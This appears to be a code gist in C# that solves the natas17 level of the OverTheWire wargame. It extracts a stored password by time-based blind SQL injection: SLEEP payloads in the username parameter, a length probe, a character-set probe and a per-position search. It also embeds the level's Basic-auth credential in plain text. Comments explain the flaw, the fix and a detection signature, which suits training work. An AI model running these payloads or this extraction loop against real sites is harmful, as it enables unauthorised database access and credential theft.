@HFahlstedt
Created March 12, 2018 14:50
// Shared HTTP client for every probe below; the host is the OverTheWire natas17 wargame level.
var client = new HttpClient();
string baseUrl = "http://natas17.natas.labs.overthewire.org";

// NOTE(review): the level credential is embedded in source and sent as HTTP Basic over plain
// http, so on the wire it is only base64-encoded, not encrypted.
byte[] credentialBytes = Encoding.UTF8.GetBytes("natas17:8Ps3H0GWbn5rd9S7GmAdgQNdkhPkq9cw");
client.DefaultRequestHeaders.Authorization =
    new AuthenticationHeaderValue("Basic", Convert.ToBase64String(credentialBytes));
// Phase 1: determine the password length from response latency alone.
// URL-decoded, the username parameter sent here is
//   natas18" AND LENGTH(password) = <n> AND SLEEP(2) #
// so the reply is delayed only when the length guess is right; the response body is never read.
// Presumably the server splices this parameter into its SQL text (not visible here). Binding it
// as a query parameter would close the timing channel, and server-side the probe is visible as
// requests carrying SLEEP( in the username field.
var passwordLength = 0;
for (var candidateLength = 1; candidateLength <= 64 && passwordLength == 0; candidateLength++)
{
    var timer = Stopwatch.StartNew();
    await client.GetStringAsync($"{baseUrl}?username=natas18%22+AND+LENGTH(password)+%3D+{candidateLength}+AND+SLEEP(2)+%23");
    timer.Stop();

    // The 1500 ms threshold sits below the 2 s delay requested in the query.
    if (timer.ElapsedMilliseconds > 1500)
    {
        passwordLength = candidateLength;
    }
}
// Phase 2: narrow the alphabet to the characters that occur anywhere in the stored value.
// Candidates are 0-9, A-Z, a-z in that order. URL-decoded, each request carries
//   natas18" AND password LIKE BINARY "%<c>%" AND SLEEP(2) #
// and a reply slower than 1500 ms is taken to mean the character is present.
var characterSet = "0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz".ToList();
var includedChars = new List<char>();
foreach (var candidate in characterSet)
{
    var timer = Stopwatch.StartNew();
    await client.GetStringAsync($"{baseUrl}?username=natas18%22+AND+password+LIKE+BINARY+%22%25{candidate}%25%22+AND+SLEEP(2)+%23");

    // Elapsed time is read while the stopwatch is still running; Stop() afterwards is cleanup only.
    var delayed = timer.ElapsedMilliseconds > 1500;
    timer.Stop();
    if (delayed)
    {
        includedChars.Add(candidate);
    }
}
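// Phase 3: recover the value one position at a time. URL-decoded, each request carries
//   natas18" AND password LIKE BINARY "<known prefix><guess>%" AND SLEEP(2) #
// and a reply slower than 1500 ms is taken to mean the prefix plus guess matches.
// Latency is the only signal used, so a slow network reply is indistinguishable from a true
// predicate and a fast one from a false predicate.
var password = new StringBuilder();
for (var position = 0; position < passwordLength; position++)
{
    var matched = false;
    foreach (var guess in includedChars)
    {
        var timer = Stopwatch.StartNew();
        await client.GetStringAsync($"{baseUrl}?username=natas18%22+AND+password+LIKE+BINARY+%22{password}{guess}%25%22+AND+SLEEP(2)+%23");
        timer.Stop();

        if (timer.ElapsedMilliseconds > 1500)
        {
            password.Append(guess);
            matched = true;
            break;
        }
    }

    // The unbounded while-loop this replaces indexed past the end of includedChars and failed
    // with ArgumentOutOfRangeException when no candidate was delayed; fail with a message that
    // names the position instead.
    if (!matched)
    {
        throw new InvalidOperationException(
            $"No candidate character produced a delayed response at position {position}.");
    }
}
Console.WriteLine(password);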